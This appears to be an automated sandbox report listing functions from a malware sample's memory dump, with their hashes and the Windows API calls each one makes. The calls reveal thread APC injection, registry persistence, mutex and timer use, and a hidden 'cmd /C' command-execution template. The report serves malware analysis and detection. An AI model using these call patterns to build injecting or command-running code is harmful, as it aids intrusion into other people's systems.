    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
